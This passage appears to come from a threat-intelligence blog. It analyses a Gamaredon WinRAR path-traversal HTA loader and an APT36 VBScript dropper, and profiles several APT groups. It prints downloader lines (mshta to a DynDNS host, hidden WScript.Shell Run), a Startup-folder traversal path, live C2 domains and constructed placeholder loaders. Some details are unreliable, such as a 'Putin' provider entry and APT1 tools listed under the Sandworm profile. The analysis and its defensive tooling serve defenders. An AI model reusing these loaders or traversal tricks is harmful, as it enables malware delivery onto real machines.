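    if STARTUP_MARKER in target and target.endswith(AUTORUN_EXT):
        return "startup"
    return "traversal"


def scan_listing(names, dest=DEST_DIR):
    """Classify every entry of an archive listing; returns {entry name: verdict}."""
    return {n: classify_entry(n, dest) for n in names}


# Constructed listing in the shape the post describes: a decoy PDF next to an
# HTA whose entry name climbs out of the extraction directory. Not a real sample.
SAMPLE_LISTING = [
    "document_2_1_1_7755_11.11.2025.pdf",
    "..\\..\\..\\..\\..\\..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu"
    "\\Programs\\Startup\\2_1_1_7755_11.11.2025.HTA",
]

if __name__ == "__main__":
    for entry, verdict in scan_listing(SAMPLE_LISTING).items():
        print(f"{verdict:9s} {entry}")
```

Because surplus “..” components are discarded at the drive root, the verdict does not depend on how deep the extraction directory actually is, which is why the attacker can use more “..” than needed.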
Now let’s take a look at what such an HTA file actually looks like:
We see an obfuscation attempt that is, let’s put it politely, more bad than good. Between the lines of the actual payload there are a lot of junk lines:
These can be filtered out easily by looking at each assigned variable. If a variable never gets used or only references itself, it can be safely removed. I did the cleanup manually, because the scripts are tiny and the obfuscation is by no means a masterpiece.
After removing the junk lines and renaming the important variables, I ended up with the following result:
The entire deobfuscation process took about five minutes. The script isn’t complex, so let’s walk through it.
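The cleanup rule just stated (drop any assigned variable that is never read anywhere except on its own assignment lines) is mechanical enough to script. As an added example that is not the post’s own tooling, the following Python applies it to a constructed VBScript fragment in the same style, iterating until no more junk can be removed; the side-effect list used to protect lines like CreateObject(...) is a heuristic assumption.

```python
import re

# Constructed HTA/VBScript fragment in the style the post describes: junk
# assignments mixed into a tiny mshta loader. The host is a placeholder.
SAMPLE_VBS = """On Error Resume Next
Dim wshell
kqz = "oUzp" & kqz
plt = 77
plt = plt + 1
Set wshell = CreateObject("WScript.Shell")
bru = "m" & "sh"
trx = bru & "ta"
payload = trx & " http://C2-PLACEHOLDER.invalid/x"
wshell.Run payload
Close"""

ASSIGN = re.compile(r"^\s*(?:Dim\s+)?([A-Za-z_]\w*)\s*=\s*(.*)$", re.IGNORECASE)
IDENT = re.compile(r"[A-Za-z_]\w*")
STRING = re.compile(r'"(?:[^"]|"")*"')
# Heuristic (assumption): an RHS calling one of these has side effects and is
# never treated as junk, even if its result is unused.
SIDE_EFFECTS = re.compile(r"\b(CreateObject|GetObject|Run|Exec|Open|Send|Write\w*)\b",
                          re.IGNORECASE)


def code_only(line):
    """Blank out string literals and trailing ' comments so identifiers inside
    them do not count as variable uses."""
    line = STRING.sub('""', line)
    return line.split("'", 1)[0]


def junk_variables(script):
    """Names whose assignments can be removed: the variable is never read on
    any surviving line other than its own assignment lines."""
    lines = [code_only(l) for l in script.splitlines()]
    alive = [True] * len(lines)
    junk = set()
    changed = True
    while changed:                 # fixpoint: removing one junk line can
        changed = False            # orphan a variable it was the only reader of
        assigned = {}
        for i, line in enumerate(lines):
            m = ASSIGN.match(line) if alive[i] else None
            if m and not SIDE_EFFECTS.search(m.group(2)):
                assigned.setdefault(m.group(1).lower(), []).append(i)
        for var, idxs in assigned.items():
            used = any(
                alive[j] and j not in idxs
                and any(t.lower() == var for t in IDENT.findall(line))
                for j, line in enumerate(lines)
            )
            if not used:
                for i in idxs:
                    alive[i] = False
                junk.add(var)
                changed = True
    return junk


def strip_junk(script):
    """Return the script with every junk assignment line removed."""
    junk = junk_variables(script)
    kept = []
    for raw in script.splitlines():
        m = ASSIGN.match(code_only(raw))
        if m and m.group(1).lower() in junk:
            continue
        kept.append(raw)
    return "\n".join(kept)


if __name__ == "__main__":
    print(strip_junk(SAMPLE_VBS))
```

Renaming the surviving variables (bru, trx, payload) to something meaningful is still a manual step, as in the post.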
The string pretends to be a legitimate Windows component.
Using mshta.exe is classic: this Windows binary can directly execute remotely hosted HTA/HTML scripts, a typical Living-off-the-Land Binary (LOLBIN) abuse.
president.gov.ua@ looks like an official Ukrainian domain.
the real host is readers.serveirc.com, a free DynDNS subdomain acting as C2 or malware hosting server.
3. It executes the payload silently
wshell.Run payload
4. Error suppression
On Error Resume Next
Runtime errors are ignored to avoid crashes or prompts.
5. It closes itself
Close
The script exists purely as a loader/downloader. No real payload is inside; instead, it fetches the actual malware (another HTA, VBS, or EXE) from readers.serveirc.com.
This aligns perfectly with Primitive Bear’s usual TTPs:
multi-stage payload chains ending in backdoors for surveillance and exfiltration (e.g., Pteranodon, GammaLoad)
abuse of Windows-native binaries (mshta.exe, wscript.exe)
phishing documents themed around Ukrainian government topics (e.g., “повістка.pdf”)
fast-changing C2 infrastructure on free DNS services (serveirc.com, myftp.biz, ddns.net)
Primitive Bear’s operations often end in the deployment of modular backdoors such as Pteranodon or GammaLoad, both of which are staples of the group’s espionage toolkit:
Pteranodon: A long-running backdoor family used by Primitive Bear since at least 2016. It supports classic cyber-espionage features such as screenshot capture, file exfiltration, keystroke logging, command execution, and staged payload delivery. Modular, noisy, but effective enough for long-term access.
GammaLoad: A lightweight downloader/backdoor frequently used as the “next stage” after initial compromise. Typically retrieves secondary modules, maintains C2 connectivity, and prepares the system for more persistent implants. Often deployed through simple LOLBIN-based loaders (like the one used here).
Nothing revolutionary, just FSB’s usual grab-bag of surveillance toys 😉
Infrastructure used in the 2025 Ukraine Campaign (so far)
Throughout my analysis, I reviewed a large number of recent samples (October – November) from this threat actor. Below is a summary and visualization of the infrastructure I identified.
The actor makes heavy use of DynDNS subdomains, such as:
readers.serveirc.com
dears.serveirc.com …and many others
All of these can be attributed to No-IP, which gives us a pool of recurring IP addresses (including IPs not associated with a Dyn-DNS domain name):
| IP address     | Provider                        | Country        |
|----------------|---------------------------------|----------------|
| 194.58.66.5    | BAXET-GROUP-INC – interlir.com  | India          |
| 194.58.66.132  | BAXET-GROUP-INC – interlir.com  | India          |
| 194.58.66.192  | BAXET-GROUP-INC – interlir.com  | India          |
| 194.87.240.141 | relcom.com                      | Czech Republic |
| 194.87.230.166 | BAXET-GROUP-INC – interlir.com  | Greece         |
| 194.87.240.215 | relcom.com                      | Czech Republic |
| 185.39.204.82  | globconnex.com                  | Turkey         |
| 45.141.234.234 | globconnex.com                  | Ireland        |
| 5.8.18.46      | Putin                           | Russia         |
Some of these IP addresses are provided via InterLIR, including the relcom.com addresses. InterLIR is essentially an IP address marketplace: companies in need of IPv4 or IPv6 space can buy, rent, or sub-lease unused ranges. The platform advertises fast provisioning, legally vetted transfers, and a European business focus.
Since IPv4 addresses are scarce (and expensive), entire micro-economies have formed around services like this, which attackers happily exploit for disposable infrastructure.
I also rechecked which of the domains still resolve to an active host. During that process, I identified fourteen domains that are currently still active and are likely still being used by the threat actor.
acess-pdf.webhop.me
backup.9fvzesn.us
creates.webhop.me
dears.serveirc.com
digitall.webhop.me
dilopendos.serveirc.com
fixer.serveirc.com
google-pdf.redirectme.net
hosting-redirect.sytes.net
political-news.serveirc.com
freedynamicdns.net
readers.serveirc.com
serversftp.serveirc.com
yeard.serveirc.com
Based on the information available so far, we can also compile an overview of the files that have been distributed through this infrastructure:
This is not the full list of files distributed in this campaign, but I'll keep track of further samples and update the list accordingly.
Recommendations for Defenders and Blue Teams
To mitigate and detect this campaign (and similar WinRAR-based exploitation attempts), I recommend the following defensive measures:
Update WinRAR immediately: ensure that WinRAR is updated to version 7.12 (Beta 1) or later, where CVE-2025-6218 has been patched.
Block execution of HTA files: in most enterprise environments, .hta files should not be executed at all. Enforce this via AppLocker, WDAC, or enterprise GPO restrictions.
Monitor for LOLBIN misuse: flag suspicious executions of:
mshta.exe
wscript.exe
powershell.exe (especially with remote URLs)
Monitor the Startup folder: creation of .hta, .vbs, .js, or unknown executables inside %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup should always be treated as a high-severity alert; keep a permanent eye on this folder.
Inspect email attachments: particularly RAR/ZIP archives containing unusual path structures (entry names with ..\ components or absolute paths) or files with deceptive "hidden extensions" (file.pdf:.hta, etc.).
Network defense: block known C2 domains and sinkhole DynDNS-based infrastructure where possible.
Endpoint logging: ensure Sysmon or a comparable EDR solution logs:
Process creation
File modification in Startup paths
Network connections from LOLBINs
Suspicious command-line parameters
Basically: watch for anything that behaves like Windows, but shouldn’t ^-^
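Added example for the "inspect email attachments" point, not tooling from the post: a scanner that lists RAR5 entry names straight from the archive headers, without extracting anything, and flags traversal components, script extensions and Startup-folder targets. It builds its own sample archive with a minimal RAR5 writer so it runs offline; the traversal path inside it is an assumption modelled on the description above, not a file from the campaign. The header walk follows the published RAR 5.0 layout (vint-encoded sizes, CRC32 covering the header from the size field to its end).

```python
import re
import struct
import zlib
from typing import Dict, List, Tuple

RAR5_SIG = b"Rar!\x1a\x07\x01\x00"
HDR_MAIN, HDR_FILE, HDR_SERVICE, HDR_END = 1, 2, 3, 5
FLAG_EXTRA, FLAG_DATA = 0x01, 0x02        # header flags: extra area / data area present
FFLAG_MTIME, FFLAG_CRC = 0x02, 0x04       # file flags: mtime / data CRC32 present
SCRIPT_EXT = (".hta", ".vbs", ".js", ".lnk", ".cmd", ".bat", ".ps1")


def vint_encode(n: int) -> bytes:
    """RAR5 variable-length integer: 7 bits per byte, high bit set while more bytes follow."""
    out = bytearray()
    while True:
        b, n = n & 0x7F, n >> 7
        out.append(b | 0x80 if n else b)
        if not n:
            return bytes(out)


def vint_decode(buf: bytes, pos: int) -> Tuple[int, int]:
    value = shift = 0
    while True:
        b, pos = buf[pos], pos + 1
        value |= (b & 0x7F) << shift
        shift += 7
        if not b & 0x80:
            return value, pos


def _block(htype: int, hflags: int, body: bytes, data: bytes = b"") -> bytes:
    """Header: CRC32 | header size | type | flags | [data size] | body, then the data area."""
    hdr = vint_encode(htype) + vint_encode(hflags)
    if hflags & FLAG_DATA:
        hdr += vint_encode(len(data))
    sized = vint_encode(len(hdr) + len(body)) + hdr + body   # CRC covers everything after itself
    return struct.pack("<I", zlib.crc32(sized)) + sized + data


def build_rar5(entries: List[Tuple[str, bytes]]) -> bytes:
    """Minimal writer (stored entries, Windows host OS), used only to construct the sample."""
    out = bytearray(RAR5_SIG) + _block(HDR_MAIN, 0, vint_encode(0))        # archive flags = 0
    for name, data in entries:
        raw = name.encode("utf-8")
        body = (vint_encode(FFLAG_CRC) + vint_encode(len(data)) + vint_encode(0x20)  # flags, size, attrs
                + struct.pack("<I", zlib.crc32(data))
                + vint_encode(0) + vint_encode(0)                                   # store, Windows
                + vint_encode(len(raw)) + raw)
        out += _block(HDR_FILE, FLAG_DATA, body, data)
    return bytes(out + _block(HDR_END, 0, vint_encode(0)))


def list_rar5_names(blob: bytes) -> List[str]:
    """Walk the headers without extracting anything and return every file entry name."""
    if not blob.startswith(RAR5_SIG):
        raise ValueError("not a RAR5 archive")
    pos, names = len(RAR5_SIG), []
    while pos < len(blob):
        crc = struct.unpack_from("<I", blob, pos)[0]
        hsize, p = vint_decode(blob, pos + 4)
        hend = p + hsize                                   # header size counts from the type field
        if zlib.crc32(blob[pos + 4:hend]) != crc:
            raise ValueError(f"header CRC mismatch at offset {pos}")
        htype, p = vint_decode(blob, p)
        hflags, p = vint_decode(blob, p)
        if hflags & FLAG_EXTRA:
            _, p = vint_decode(blob, p)
        dsize = 0
        if hflags & FLAG_DATA:
            dsize, p = vint_decode(blob, p)
        if htype in (HDR_FILE, HDR_SERVICE):
            fflags, p = vint_decode(blob, p)
            _, p = vint_decode(blob, p)                    # unpacked size
            _, p = vint_decode(blob, p)                    # attributes
            p += (4 if fflags & FFLAG_MTIME else 0) + (4 if fflags & FFLAG_CRC else 0)
            _, p = vint_decode(blob, p)                    # compression info
            _, p = vint_decode(blob, p)                    # host OS
            nlen, p = vint_decode(blob, p)
            if htype == HDR_FILE:
                names.append(blob[p:p + nlen].decode("utf-8", "replace"))
        pos = hend + dsize                                 # skip the data area, never inflate it
        if htype == HDR_END:
            break
    return names


def entry_is_suspicious(name: str) -> List[str]:
    """Reasons an entry name should block the archive before any extraction happens."""
    reasons = []
    if ".." in re.split(r"[\\/]+", name) or name.startswith(("/", "\\")) or re.match(r"[A-Za-z]:", name):
        reasons.append("path traversal / absolute path")
    if name.lower().endswith(SCRIPT_EXT):
        reasons.append("script or shortcut extension")
    if re.search(r"start menu[\\/]programs[\\/]startup", name, re.I):
        reasons.append("targets the Startup folder")
    return reasons


def scan_archive(blob: bytes) -> Dict[str, List[str]]:
    return {n: r for n in list_rar5_names(blob) if (r := entry_is_suspicious(n))}


# Constructed sample: a benign lure plus a traversal entry of the kind described above (assumption).
TRAVERSAL = "../../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/update.hta"
SAMPLE_ARCHIVE = build_rar5([("report.pdf", b"%PDF-1.4 constructed lure"),
                             (TRAVERSAL, b"<script>/* constructed placeholder */</script>")])

if __name__ == "__main__":
    for entry, why in scan_archive(SAMPLE_ARCHIVE).items():
        print(f"{entry}: {', '.join(why)}")
```

Because the scanner only reads headers, it is safe to run on a mail gateway against untrusted archives; it never hands the file to an extractor. Encrypted headers (archive encryption header, type 4) are out of scope here and should simply be treated as a block-by-default case.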
I recently discovered a sample attributed to the threat actor APT36 (“Transparent Tribe”) on MalwareBazaar. APT36 is a Pakistan-aligned cyber-espionage group that has been active since at least 2013 and is primarily focused on intelligence collection against targets in South Asia (government, military, diplomatic and research organizations in India and Afghanistan). The group is known for tailored phishing campaigns and diverse staging techniques (weaponized documents, malicious installers and platform-specific lures), and has a history of delivering custom backdoors and RAT families such as CrimsonRAT and ElizaRAT variants. Recently observed activity shows the actor expanding its toolset and delivery methods (including Linux desktop lures and cloud-hosted payloads), which underlines the need to treat seemingly innocuous artifacts (obfuscated scripts, shortcut files, or odd AppData/Temp files) as potentially dangerous.
The sample turned out to be a heavily obfuscated VBScript. In this post I will walk through the manual deobfuscation steps I performed. The SHA256 hash of the file is “d35f88dce5dcd7a1a10c05c2feba1cf478bdb8a65144f788112542949c36dd87”
I first uploaded the file to VirusTotal. It had first been submitted there yesterday (18 October 2025), and some AV engines already detect the file as malicious.
(note: I call this sample “Abaris” because the dropper decodes part of its payload and writes it into a file named Abaris.txt, which is later used for execution.)
Original filename: Pak_Afghan_War_Impact_on_Northern_Border_India.vbs. I made a copy and renamed it to ap3.vbs for analysis.
When opening the file, you immediately notice a lot of Danish-looking comments/words scattered through the source. These are purely noise, they are there to hinder analysis and evade signature detection. But underneath the noise we can still find Visual Basic constructs that we want to extract.
We can filter out those comment lines very easily.
# drop full-line comments (including indented ones), then blank lines
grep -v "^[[:space:]]*'" ap3.vbs | sed '/^[[:space:]]*$/d' > ap3_clean.vbs
The output looks much cleaner now, clear VB structures are visible, although the script remains heavily obfuscated.
The next step is to remove additional noise by deleting variables or code blocks that are only used in initialization and never referenced later.
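Added example, not the post's own tooling (the same pruning step was done by hand on the Gamaredon HTA earlier on this page): a small dead-assignment pruner for VBScript that automates the rule "a variable that is never used, or only references itself, can go". It assumes one statement per line (no colon-separated statements) and runs to a fixpoint, because removing one junk line can orphan the line that fed it. The script it runs on is constructed and the identifiers are made up.

```python
import re

IDENT = re.compile(r"[A-Za-z_]\w*")
ASSIGN = re.compile(r"^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=", re.IGNORECASE)
DIM = re.compile(r"^(\s*)Dim\s+(.+?)\s*$", re.IGNORECASE)
STRING = re.compile(r'"(?:[^"]|"")*"')      # VBScript literal, inner quotes are doubled


def _is_live(name: str, lines) -> bool:
    """True if `name` is referenced anywhere other than its own Dim or its own assignments.
    VBScript identifiers are case-insensitive; string literals are blanked first so that
    text inside quotes never counts as a reference."""
    n = name.lower()
    for ln in lines:
        if DIM.match(ln):
            continue
        m = ASSIGN.match(ln)
        if m and m.group(1).lower() == n:
            continue                      # x = x & "..." keeps nothing alive
        if any(tok.lower() == n for tok in IDENT.findall(STRING.sub('""', ln))):
            return True
    return False


def prune_once(lines):
    out = []
    for ln in lines:
        m = ASSIGN.match(ln)
        if m and not _is_live(m.group(1), lines):
            continue                      # dead assignment
        d = DIM.match(ln)
        if d:
            live = [v.strip() for v in d.group(2).split(",") if _is_live(v.strip(), lines)]
            if not live:
                continue                  # every declared name is dead
            ln = f"{d.group(1)}Dim {', '.join(live)}"
        out.append(ln)
    return out


def prune_dead_code(script: str) -> str:
    """Iterate until no line changes any more."""
    lines = script.splitlines()
    while True:
        new = prune_once(lines)
        if new == lines:
            return "\n".join(new)
        lines = new


# Constructed sample in the style of the obfuscated dropper (assumption: names are made up).
SAMPLE = """Dim Galactometer, Tudemiklens, Mellemrum
Mellemrum = "junk"
Mellemrum = Mellemrum & "more junk"
Set Plenicorn = CreateObject("WScript.Shell")
Tudemiklens = "mshta http://example.invalid/x"
Ordgyde = Mellemrum
Call Plenicorn.Run(Tudemiklens, 0)"""

if __name__ == "__main__":
    print(prune_dead_code(SAMPLE))
```

On the sample, the first pass removes Ordgyde (never read) and Galactometer (declared only); the second pass then removes both Mellemrum lines, whose only remaining reader was the deleted Ordgyde line, leaving the shell object, the command string and the Run call.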
After cleanup, the following code remains:
This is already much tidier. We identified three functions of interest: Crocodilite, Subskribenten, and Cashoo. They are small and not deeply obfuscated, so we can determine their purpose fairly quickly. It’s often useful at this stage to rename obfuscated variables and functions to meaningful names.
Crocodilite
This function creates a text file and writes the passed string into it. In this sample it is used to write the content of the variable tendrilous into Abaris.txt.
' ORIGINAL
Sub Crocodilite(Tudemiklens, Fissuriform)
Dim Sinh, Galactometer
Set Sinh = CreateObject("Scripting.FileSystemObject")
Set Galactometer = Sinh.CreateTextFile(Fissuriform, True)
Galactometer.Write Tudemiklens
Galactometer.Close
End Sub
' ADJUSTED
Sub write_to_file(text, path)
    Dim fileSysObj, file
    Set fileSysObj = CreateObject("Scripting.FileSystemObject")
    Set file = fileSysObj.CreateTextFile(path, True)   ' True = overwrite an existing file
    file.Write text
    file.Close
End Sub
Subskribenten
This is a simple wrapper that executes a command via WScript.Shell. It’s used to invoke the payload that was written to disk.
' ORIGINAL
Set Plenicorn = CreateObject("WScript.Shell")
...
Function Subskribenten(Tautegorical)
Call Plenicorn.Run(Tautegorical,0)
End Function
' ADJUSTED
Set shell = CreateObject("WScript.Shell")
...
' renamed to run_payload: "Execute" is a VBScript statement and cannot be used as a function name
Function run_payload(payload)
    Call shell.Run(payload, 0)   ' 0 = hidden window
End Function
Cashoo
A decoder routine. It extracts characters at fixed intervals from a masking string (i.e. it removes padding characters and reconstructs the hidden string). This is a classic technique to hide URLs, commands or other sensitive strings from static signature scanners.
' ORIGINAL
Function Cashoo(ByVal Microsphaeric)
for i = 4 to len(Text) Step 4
' Mid(string, start, length) extract a specified amount of characters from a string
Cashoo = Cashoo & Mid(Text,i,Alenlang)
Next
End Function
' ADJUSTED
Function ExtractEveryFourthChar(ByVal Text)
    Dim i, Alenlang
    Alenlang = 1   ' characters taken per step (assumed 1, as the function name implies)
    for i = 4 to len(Text) Step 4
        ' Mid(string, start, length) extracts a specified number of characters from a string
        ExtractEveryFourthChar = ExtractEveryFourthChar & Mid(Text, i, Alenlang)
    Next
End Function
I implemented a Python equivalent to decode the payload. After I finished the script I fed several encoded strings from the VB file through it. Additionally, I loaded every string found for the variable “tendrilous” into a separate file “tendrilous.txt” for decoding purposes. You can view the script here.
The Python routine works as intended: it reads Abaris.txt, extracts a three-character command name from a specific offset, and would invoke that command with the file content as parameter, i.e. dynamic code execution.
I also implemented a Python equivalent for this routine; the script is available in the repository.
After running my script, the payload output looks like this:
At first glance the output looks nasty, but it can be disentangled. Don’t panic. I applied line breaks and indentation in the right places to make control flow and function calls visible.
To make the code more readable I used the following commands:
sed -i 's/;\$/;\n\$/g' "$1"
sed -i 's/;Cenogenesis/;\nCenogenesis/g' "$1"
sed -i 's/{/{\n/g' "$1"
sed -i 's/}/\n}\n/g' "$1"
sed -i 's/;function/;\nfunction/g' "$1"
sed -i 's/;while/;\nwhile/g' "$1"
The result now looks much more promising:
There is still some noise embedded in a few places. We also discovered repeated calls to the Roberts function with additional encoded strings. I wrote a Python helper to extract those strings from the file and decode them with the same Roberts / Cashoo logic.
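Added example, not the post's script (the original helper was linked, not reproduced): a Python port of the Cashoo decoder plus an extractor that pulls the padded literals out of Cashoo(...) and Roberts(...) calls and decodes them in bulk. It assumes, as stated above, that Roberts uses the same every-fourth-character logic as Cashoo; the VBScript fragment and the URLs it decodes are constructed for the demonstration.

```python
import re
from typing import Dict, List


def cashoo_decode(text: str, step: int = 4, width: int = 1) -> str:
    """Port of `for i = 4 to len(Text) Step 4: out = out & Mid(Text, i, width)`.
    VBScript Mid() is 1-based, hence the i - 1."""
    return "".join(text[i - 1:i - 1 + width] for i in range(step, len(text) + 1, step))


def cashoo_encode(secret: str, step: int = 4, pad: str = "qwertyuiopasdfghjklzxcvbnm") -> str:
    """Inverse, used only to build test data: step-1 junk characters precede each real one."""
    out, j = [], 0
    for ch in secret:
        for _ in range(step - 1):
            out.append(pad[j % len(pad)])
            j += 1
        out.append(ch)
    return "".join(out)


# Matches Cashoo("...") / Roberts("...") with a string-literal argument; VBScript doubles inner quotes.
CALL_RE = re.compile(r'\b(Cashoo|Roberts)\s*\(\s*"((?:[^"]|"")*)"\s*\)')


def decode_calls(script: str) -> List[Dict[str, str]]:
    """Pull every padded literal out of the script and decode it instead of running the VBScript."""
    found = []
    for m in CALL_RE.finditer(script):
        literal = m.group(2).replace('""', '"')
        found.append({"func": m.group(1), "encoded": literal, "decoded": cashoo_decode(literal)})
    return found


# Constructed VBScript fragment (assumption: not the real sample) with two padded literals.
SAMPLE_VBS = (
    "Dim u, c\n"
    f'u = Cashoo("{cashoo_encode("https://example.invalid/stage2.ps1")}")\n'
    f'c = Roberts("{cashoo_encode("powershell -w hidden -ep bypass")}")\n'
)

if __name__ == "__main__":
    for hit in decode_calls(SAMPLE_VBS):
        print(f"{hit['func']}: {hit['decoded']}")
```

Decoding statically like this keeps the analysis off the interpreter entirely; if a later variant changes the stride or the width, only the two default arguments need adjusting.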
When we run that pipeline and merge the output under the previous deobfuscated view, we obtain the following consolidated result:
Final Script
This is the final deobfuscated dropper script. From it we can conclude the following:
The script repeatedly attempts to download a remote file from a suspicious URL and save it locally.
Once the file is available, it reads parts of it, Base64-decodes contained data, and reconstructs executable PowerShell code.
Finally, it executes that decoded code dynamically (via dot-sourcing / Invoke-Expression style execution). This is a classic loader / bootstrapper pattern for delivering secondary stages of malware.
There are some formatting glitches in the decoded output that likely arose during processing, but the overall intent is clear.
The dropper notably points at hxxps[://]zohmailcloud[.]com//cloud/Assholes[.]psm as one of the remote payload locations. I could not retrieve the file, the URL is no longer reachable but I did find a Twitter post referencing the file with MD5 7a5fe1af036b6dba35695e6d4f5cc80f.
If I manage to acquire the remote artifact later, I will write a dedicated follow-up article with a full 2nd-stage analysis.
Origin: Russia, linked to Military Unit 74455, a cyberwarfare unit of the GRU, Russia's military intelligence service
Active Since: 2004
Primary Targets: Western corporations, government organizations, defense contractors
Motivation: Cybersabotage, data theft
Tactics & Techniques
Initial Access
– T1190 – Exploit Public-Facing Application
– T1203 – Exploitation for Client Execution
– T1566.001 – Phishing: Spearphishing Attachment (malicious files delivered by spearphishing)
Execution
– T1059 – Command and Scripting Interpreter
– T1059.001 – PowerShell
– T1059.003 – Windows Command Shell
– T1059.005 – Visual Basic (VBS)
Persistence
– T1543 – Create or Modify System Process (e.g. Windows service / systemd service modifications)
– T1053.005 – Scheduled Task (scheduled tasks deployed via GPOs / scheduled jobs)
Privilege Escalation
– various techniques observed in campaign artifacts; see Mandiant for low-level syscall / evasive behaviours
Defense Evasion
– T1140 – Deobfuscate/Decode Files or Information (Base64, TripleDES, GZip usage)
– T1027 – Obfuscated Files or Information (software packing / obfuscation)
– T1562 – Impair Defenses (e.g. Disable or Modify Tools; Disable Windows Event Logging)
Credential Access
– T1555.003 – Credentials from Password Stores: Credentials from Web Browsers
– T1003 – OS Credential Dumping (e.g. LSASS memory dumping observed historically)
– T1056.001 – Input Capture: Keylogging (SetWindowsHookEx keylogger observed)
Discovery
– T1087.002 – Account Discovery: Domain Account (via LDAP queries)
– T1592.002 – Gather Victim Host Information: Software
– T1018 – Remote System Discovery
– T1046 – Network Service Discovery (active scanning / vulnerability scanning)
Lateral Movement
– T1021.002 – Remote Services: SMB/Windows Admin Shares (use of ADMIN$, net use)
– T1570 – Lateral Tool Transfer and T1105 – Ingress Tool Transfer (copying payloads, using network shares)
Collection
– T1213 – Data from Information Repositories (databases; e.g. use of Adminer to exfiltrate DB data)
– T1005 – Data from Local System (internal docs, files)
Exfiltration
– T1041 – Exfiltration Over C2 Channel (HTTP C2 exfil observed)
Command and Control
– T1071.001 – Application Layer Protocol: Web Protocols (HTTP used by BCS-server and other tools)
– Protocol tunneling / non-standard channels have also been used in some campaigns
Impact
– T1486 – Data Encrypted for Impact (ransomware / Prestige used)
– T1561.002 – Disk Wipe: Disk Structure Wipe (KillDisk/CaddyWiper usage)
– T1484.001 – Domain or Tenant Policy Modification: Group Policy Modification (used to deploy wipers via GPO)
– T1499 – Endpoint Denial of Service (observed in disruption campaigns)
– T1491.002 – Defacement: External Defacement (mass website defacements)
Resource Development / Reconnaissance (preparation)
– T1583 – Acquire Infrastructure (domains, servers, covert leased infrastructure)
– T1583.001 – Domains (register spoofing domains)
– T1583.004 – Server (use of leased / reseller infrastructure)
– T1595.002 – Active Scanning: Vulnerability Scanning (scanning target infrastructure)
Other observed behaviours / capabilities
– Use of custom destructive malware families (NotPetya, Industroyer variants, Olympic Destroyer, CaddyWiper, etc.)
– Use of third-party services for phishing campaigns and spoofed pages for credential harvesting
Notable Campaigns:
Exfiltration of corporate data across multiple industries, including aerospace, energy, and technology
Attributed Tools & Malware:
BlackEnergy (BlackEnergy 3) – former backdoor/botnet framework used in attacks on Ukrainian energy suppliers (2015), among others.
KillDisk (various wiper variants) – Destructive component used to destroy hosts in multiple campaigns.
NotPetya / ExPetr (wiper masquerading as ransomware) – large-scale destruction/worm campaign in 2017.
Industroyer / Industroyer2 (CrashOverride) – specifically designed for industrial control systems (ICS); the Industroyer family has been observed in Ukrainian infrastructure operations.
Olympic Destroyer – Wiper/disruption malware used against the Pyeongchang Olympics; attribution was complicated, but often linked to Sandworm.
CaddyWiper / other GPO/AD wipers – modern wiper variants that have appeared in recent sabotage campaigns.
Infamous Chisel (Android components / Infamous Chisel family) – Persistent access/backdoor components for Android (2023 reports on Android targets).
SwiftSlicer / AD wipers – local and Active Directory-targeted wiper components that appear in attack reports from 2023–2024.
Custom C2/Beacon implementations & loaders (TeleBots / bespoke tooling) – Sandworm used its own C2 backdoors, beacon implementations, and droppers; TeleBots branding appears in connection with NotPetya.
Downloaders / droppers / Android wrappers / malicious app wrappers – previous campaigns showed downloader wrappers in Play Store apps and disguised Android apps to deliver additional components.
APT44 (commonly tracked as Sandworm Team or GRU Unit 74455) is a state-sponsored Russian cyber-espionage and sabotage actor known for highly targeted, persistent operations against government, military, critical-infrastructure, and high-value private sector targets. The group blends sophisticated custom tooling with commodity malware and living-off-the-land techniques to gain access, escalate privileges, move laterally, and maintain stealthy persistence. Its campaigns range from long-term intelligence collection to disruptive, destructive actions, deploying modular router malware, destructive wipers, and ICS-focused toolsets when operational goals demand sabotage. Operators demonstrate strong operational security, anti-sandbox/anti-analysis measures, and careful timing to align cyber activity with geopolitical objectives.
GOGGLES – Downloader used by the group (serves as a payload/secondary-stage downloader).
GLASSES – A variant or close relative of GOGGLES; identified in a Citizen Lab analysis and likely an earlier or related implementation.
AURIGA / BANGAT – Tools linked to a developer tracked as “SuperHard”; mentioned by Mandiant but not always named in the public report.
Email-exfiltration utilities: GETMAIL (used to extract PST files) and MAPIGET (used to read emails that haven't been archived).
Public privilege-escalation tools: examples include cachedump, fgdump, and gsecdump, not unique to APT1 but observed in their operations.
HTRAN (HUC Packet Transmit Tool) – used as a hop/proxy relay to forward communications between victims and command-and-control servers, helping to obscure origin and routing.
APT1, often called the Comment Crew or PLA Unit 61398, is one of the most infamous and well-documented cyber espionage groups linked to the Chinese government. First brought into the spotlight by Mandiant’s 2013 report, APT1 was among the first hacking units publicly tied to a specific branch of China’s military, the People’s Liberation Army, revealing the true scale of state-backed digital espionage for economic and strategic gain.
Active since at least 2006, APT1 ran one of the most disciplined and long-running hacking operations ever uncovered. Its members focused on stealing intellectual property and confidential business information from hundreds of organizations across industries like aerospace, defense, energy, telecom, and manufacturing – mostly in the United States, but also in Europe and Asia. Everything they took seemed to serve China’s national interests, whether by boosting its industries or informing military and political strategies.
Technically, APT1 was known for its methodical and repeatable playbook. The group broke in through targeted phishing emails and custom malware such as the WEBC2 family (with variants like WEBC2-AUSOV and WEBC2-GREENCAT). Once inside, they harvested mailboxes and credentials with tools such as GETMAIL and MAPIGET (email collection) and FGDump (password-hash dumping), and routed stolen data through a vast command-and-control network of more than 1,000 servers and 2,500 domains, often masked with tools like HTRAN to hide their tracks. Their infrastructure and coding style were remarkably consistent, the work of full-time engineers, not lone hackers.
What made APT1 stand out wasn’t just the scale of its operations, but the professionalism behind it. Investigators found evidence of shift-based work hours, organized infrastructure, and shared codebases, all pointing to a state-run, military-grade espionage unit based in Shanghai. The exposure of APT1 changed how the world viewed cyber conflict, proving that digital espionage could be conducted with the same structure and intent as any traditional military campaign.
In many ways, APT1 set the template for the modern nation-state hacking group: large, organized, patient, and focused on long-term strategic advantage rather than chaos or quick profit. Its legacy still shapes how governments and companies think about cybersecurity and geopolitical risk today.